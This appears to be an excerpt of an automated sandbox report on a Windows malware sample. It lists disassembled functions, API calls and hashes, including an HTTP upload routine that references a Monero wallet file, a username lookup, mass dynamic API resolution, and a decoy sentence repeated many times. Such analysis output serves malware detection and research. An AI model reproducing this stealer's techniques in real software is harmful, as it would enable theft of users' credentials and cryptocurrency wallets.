                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4734
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: b9ad137eba9aec70e354105b709bcfe68a4fe73a252d4eb6059adf28a0c899b7
                              • Instruction ID: bfc8a327f107ad683411b751bb77dce2fdac23dec6cb4f62be7633eb503823aa
                              • Opcode Fuzzy Hash: b9ad137eba9aec70e354105b709bcfe68a4fe73a252d4eb6059adf28a0c899b7
                              • Instruction Fuzzy Hash: E54136687F7E84AAC768B7E5884EEBD7757DF42B0EF505044A840522CECBF0672C452A
                              Function 001C4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 1c4880-1c4942 call 1da7a0 call 1c47b0 call 1da740 * 5 InternetOpenA StrCmpCA 816 1c494b-1c494f 801->816 817 1c4944 801->817 818 1c4ecb-1c4ef3 InternetCloseHandle call 1daad0 call 1c9ac0 816->818 819 1c4955-1c4acd call 1d8b60 call 1da920 call 1da8a0 call 1da800 * 2 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da920 call 1da8a0 call 1da800 * 2 InternetConnectA 816->819 817->816 829 1c4ef5-1c4f2d call 1da820 call 1da9b0 call 1da8a0 call 1da800 818->829 830 1c4f32-1c4fa2 call 1d8990 * 2 call 1da7a0 call 1da800 * 8 818->830 819->818 905 1c4ad3-1c4ad7 819->905 829->830 906 1c4ad9-1c4ae3 905->906 907 1c4ae5 905->907 908 1c4aef-1c4b22 HttpOpenRequestA 906->908 907->908 909 1c4ebe-1c4ec5 InternetCloseHandle 908->909 910 1c4b28-1c4e28 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da9b0 call 1da8a0 call 1da800 call 1da920 call 1da8a0 call 1da800 call 1da740 call 1da920 * 2 call 1da8a0 call 1da800 * 2 call 1daad0 lstrlen call 1daad0 * 2 lstrlen call 1daad0 HttpSendRequestA 908->910 909->818 1021 1c4e32-1c4e5c InternetReadFile 910->1021 1022 1c4e5e-1c4e65 1021->1022 1023 1c4e67-1c4eb9 InternetCloseHandle call 1da800 1021->1023 1022->1023 1024 1c4e69-1c4ea7 call 1da9b0 call 1da8a0 call 1da800 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C4915
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001E0DDB,00000000,?,?,00000000,?,",00000000,?,014AEAF8), ref: 001C4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C4E49
                              • InternetCloseHandle.WININET(00000000), ref: 001C4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 001C4EC5
                              • HttpOpenRequestA.WININET(00000000,014AE9C8,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C4B15
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • InternetCloseHandle.WININET(00000000), ref: 001C4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                              • Instruction ID: e356788a342f2a02b2b39553800bcb82e6da6e0433d1307a7266470fe4d75db2
                              • Opcode Fuzzy Hash: d154d938e119b39d2800797960ae6fc1c2e8f82ed8e262f6281bd9644472c3cc
                              • Instruction Fuzzy Hash: 74121171910158AADB15EB90DDA2FEEB338BF24301F90419AB50673191EF706F49CF66
                              Function 001D7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                              • Instruction ID: 68b5c14631a8a3b8f0d653a7b51b2a28cde63d99b743189dad970cc9c3fbd47f
                              • Opcode Fuzzy Hash: ff2e85a06ae1d3bd0daeb20d90245a02f0216168d37cb2a64563e19a94419507
                              • Instruction Fuzzy Hash: AFF04FB2944208ABC714DF98DD49BAEBBB8EB05711F10426AFA05A3780C77455048BA1
                              Function 001C1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 102c24742ab15010738fcf705b4a701a8f0b3f33881cf78cf4e1ac17c9e0955c
                              • Instruction ID: a074f297f9e17dbef0ae503ffbcba7568757581574ad3fa8a2b461c5ddf6f264
                              • Opcode Fuzzy Hash: 102c24742ab15010738fcf705b4a701a8f0b3f33881cf78cf4e1ac17c9e0955c
                              • Instruction Fuzzy Hash: DAD05E7490030CDBCB00DFE0D949AEDBB78FB08311F000568DD0573340EB309491CAAA
                              Function 001D9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 1d9c10-1d9c1a 634 1da036-1da0ca LoadLibraryA * 8 633->634 635 1d9c20-1da031 GetProcAddress * 43 633->635 636 1da0cc-1da141 GetProcAddress * 5 634->636 637 1da146-1da14d 634->637 635->634 636->637 638 1da216-1da21d 637->638 639 1da153-1da211 GetProcAddress * 8 637->639 640 1da21f-1da293 GetProcAddress * 5 638->640 641 1da298-1da29f 638->641 639->638 640->641 642 1da2a5-1da332 GetProcAddress * 6 641->642 643 1da337-1da33e 641->643 642->643 644 1da41f-1da426 643->644 645 1da344-1da41a GetProcAddress * 9 643->645 646 1da428-1da49d GetProcAddress * 5 644->646 647 1da4a2-1da4a9 644->647 645->644 646->647 648 1da4dc-1da4e3 647->648 649 1da4ab-1da4d7 GetProcAddress * 2 647->649 650 1da515-1da51c 648->650 651 1da4e5-1da510 GetProcAddress * 2 648->651 649->648 652 1da612-1da619 650->652 653 1da522-1da60d GetProcAddress * 10 650->653 651->650 654 1da67d-1da684 652->654 655 1da61b-1da678 GetProcAddress * 4 652->655 653->652 656 1da69e-1da6a5 654->656 657 1da686-1da699 GetProcAddress 654->657 655->654 658 1da708-1da709 656->658 659 1da6a7-1da703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014957F0), ref: 001D9C2D
                              • GetProcAddress.KERNEL32(74DD0000,014958B0), ref: 001D9C45
                              • GetProcAddress.KERNEL32(74DD0000,014A9610), ref: 001D9C5E
                              • GetProcAddress.KERNEL32(74DD0000,014A96B8), ref: 001D9C76
                              • GetProcAddress.KERNEL32(74DD0000,014A9670), ref: 001D9C8E
                              • GetProcAddress.KERNEL32(74DD0000,014A9628), ref: 001D9CA7
                              • GetProcAddress.KERNEL32(74DD0000,0149B608), ref: 001D9CBF
                              • GetProcAddress.KERNEL32(74DD0000,014AD488), ref: 001D9CD7
                              • GetProcAddress.KERNEL32(74DD0000,014AD470), ref: 001D9CF0
                              • GetProcAddress.KERNEL32(74DD0000,014AD4A0), ref: 001D9D08
                              • GetProcAddress.KERNEL32(74DD0000,014AD3F8), ref: 001D9D20
                              • GetProcAddress.KERNEL32(74DD0000,01495810), ref: 001D9D39
                              • GetProcAddress.KERNEL32(74DD0000,01495830), ref: 001D9D51
                              • GetProcAddress.KERNEL32(74DD0000,014958F0), ref: 001D9D69
                              • GetProcAddress.KERNEL32(74DD0000,01495A30), ref: 001D9D82
                              • GetProcAddress.KERNEL32(74DD0000,014AD5A8), ref: 001D9D9A
                              • GetProcAddress.KERNEL32(74DD0000,014AD428), ref: 001D9DB2
                              • GetProcAddress.KERNEL32(74DD0000,0149B6F8), ref: 001D9DCB
                              • GetProcAddress.KERNEL32(74DD0000,01495A90), ref: 001D9DE3
                              • GetProcAddress.KERNEL32(74DD0000,014AD4D0), ref: 001D9DFB
                              • GetProcAddress.KERNEL32(74DD0000,014AD410), ref: 001D9E14
                              • GetProcAddress.KERNEL32(74DD0000,014AD4B8), ref: 001D9E2C
                              • GetProcAddress.KERNEL32(74DD0000,014AD4E8), ref: 001D9E44
                              • GetProcAddress.KERNEL32(74DD0000,014956B0), ref: 001D9E5D
                              • GetProcAddress.KERNEL32(74DD0000,014AD578), ref: 001D9E75
                              • GetProcAddress.KERNEL32(74DD0000,014AD440), ref: 001D9E8D
                              • GetProcAddress.KERNEL32(74DD0000,014AD458), ref: 001D9EA6
                              • GetProcAddress.KERNEL32(74DD0000,014AD500), ref: 001D9EBE
                              • GetProcAddress.KERNEL32(74DD0000,014AD518), ref: 001D9ED6
                              • GetProcAddress.KERNEL32(74DD0000,014AD530), ref: 001D9EEF
                              • GetProcAddress.KERNEL32(74DD0000,014AD548), ref: 001D9F07
                              • GetProcAddress.KERNEL32(74DD0000,014AD590), ref: 001D9F1F
                              • GetProcAddress.KERNEL32(74DD0000,014AD560), ref: 001D9F38
                              • GetProcAddress.KERNEL32(74DD0000,014AA4B0), ref: 001D9F50
                              • GetProcAddress.KERNEL32(74DD0000,014ACE58), ref: 001D9F68
                              • GetProcAddress.KERNEL32(74DD0000,014AD098), ref: 001D9F81
                              • GetProcAddress.KERNEL32(74DD0000,01495990), ref: 001D9F99
                              • GetProcAddress.KERNEL32(74DD0000,014ACE70), ref: 001D9FB1
                              • GetProcAddress.KERNEL32(74DD0000,014959B0), ref: 001D9FCA
                              • GetProcAddress.KERNEL32(74DD0000,014AD0B0), ref: 001D9FE2
                              • GetProcAddress.KERNEL32(74DD0000,014ACFF0), ref: 001D9FFA
                              • GetProcAddress.KERNEL32(74DD0000,014956D0), ref: 001DA013
                              • GetProcAddress.KERNEL32(74DD0000,01495CB0), ref: 001DA02B
                              • LoadLibraryA.KERNEL32(014AD008,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA03D
                              • LoadLibraryA.KERNEL32(014ACE88,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA04E
                              • LoadLibraryA.KERNEL32(014ACEA0,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA060
                              • LoadLibraryA.KERNEL32(014AD020,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA072
                              • LoadLibraryA.KERNEL32(014ACEB8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA083
                              • LoadLibraryA.KERNEL32(014AD068,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA095
                              • LoadLibraryA.KERNEL32(014AD0C8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0A7
                              • LoadLibraryA.KERNEL32(014ACED0,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0B8
                              • GetProcAddress.KERNEL32(75290000,01495C90), ref: 001DA0DA
                              • GetProcAddress.KERNEL32(75290000,014ACE40), ref: 001DA0F2
                              • GetProcAddress.KERNEL32(75290000,014A9038), ref: 001DA10A
                              • GetProcAddress.KERNEL32(75290000,014ACEE8), ref: 001DA123
                              • GetProcAddress.KERNEL32(75290000,01495E30), ref: 001DA13B
                              • GetProcAddress.KERNEL32(734C0000,0149B5E0), ref: 001DA160
                              • GetProcAddress.KERNEL32(734C0000,01495D50), ref: 001DA179
                              • GetProcAddress.KERNEL32(734C0000,0149B838), ref: 001DA191
                              • GetProcAddress.KERNEL32(734C0000,014ACF00), ref: 001DA1A9
                              • GetProcAddress.KERNEL32(734C0000,014ACF18), ref: 001DA1C2
                              • GetProcAddress.KERNEL32(734C0000,01495E10), ref: 001DA1DA
                              • GetProcAddress.KERNEL32(734C0000,01495DB0), ref: 001DA1F2
                              • GetProcAddress.KERNEL32(734C0000,014AD080), ref: 001DA20B
                              • GetProcAddress.KERNEL32(752C0000,01495DF0), ref: 001DA22C
                              • GetProcAddress.KERNEL32(752C0000,01495CD0), ref: 001DA244
                              • GetProcAddress.KERNEL32(752C0000,014ACFA8), ref: 001DA25D
                              • GetProcAddress.KERNEL32(752C0000,014ACF30), ref: 001DA275
                              • GetProcAddress.KERNEL32(752C0000,01495D90), ref: 001DA28D
                              • GetProcAddress.KERNEL32(74EC0000,0149B630), ref: 001DA2B3
                              • GetProcAddress.KERNEL32(74EC0000,0149B658), ref: 001DA2CB
                              • GetProcAddress.KERNEL32(74EC0000,014ACF48), ref: 001DA2E3
                              • GetProcAddress.KERNEL32(74EC0000,01495CF0), ref: 001DA2FC
                              • GetProcAddress.KERNEL32(74EC0000,01495D10), ref: 001DA314
                              • GetProcAddress.KERNEL32(74EC0000,0149B770), ref: 001DA32C
                              • GetProcAddress.KERNEL32(75BD0000,014ACF60), ref: 001DA352
                              • GetProcAddress.KERNEL32(75BD0000,01495D30), ref: 001DA36A
                              • GetProcAddress.KERNEL32(75BD0000,014A9088), ref: 001DA382
                              • GetProcAddress.KERNEL32(75BD0000,014AD038), ref: 001DA39B
                              • GetProcAddress.KERNEL32(75BD0000,014ACFC0), ref: 001DA3B3
                              • GetProcAddress.KERNEL32(75BD0000,01495BF0), ref: 001DA3CB
                              • GetProcAddress.KERNEL32(75BD0000,01495B70), ref: 001DA3E4
                              • GetProcAddress.KERNEL32(75BD0000,014ACFD8), ref: 001DA3FC
                              • GetProcAddress.KERNEL32(75BD0000,014ACF78), ref: 001DA414
                              • GetProcAddress.KERNEL32(75A70000,01495AF0), ref: 001DA436
                              • GetProcAddress.KERNEL32(75A70000,014ACF90), ref: 001DA44E
                              • GetProcAddress.KERNEL32(75A70000,014AD050), ref: 001DA466
                              • GetProcAddress.KERNEL32(75A70000,014AD0E0), ref: 001DA47F
                              • GetProcAddress.KERNEL32(75A70000,014ACDF8), ref: 001DA497
                              • GetProcAddress.KERNEL32(75450000,01495C70), ref: 001DA4B8
                              • GetProcAddress.KERNEL32(75450000,01495D70), ref: 001DA4D1
                              • GetProcAddress.KERNEL32(75DA0000,01495DD0), ref: 001DA4F2
                              • GetProcAddress.KERNEL32(75DA0000,014ACE10), ref: 001DA50A
                              • GetProcAddress.KERNEL32(6F070000,01495B10), ref: 001DA530
                              • GetProcAddress.KERNEL32(6F070000,01495E50), ref: 001DA548
                              • GetProcAddress.KERNEL32(6F070000,01495B90), ref: 001DA560
                              • GetProcAddress.KERNEL32(6F070000,014ACE28), ref: 001DA579
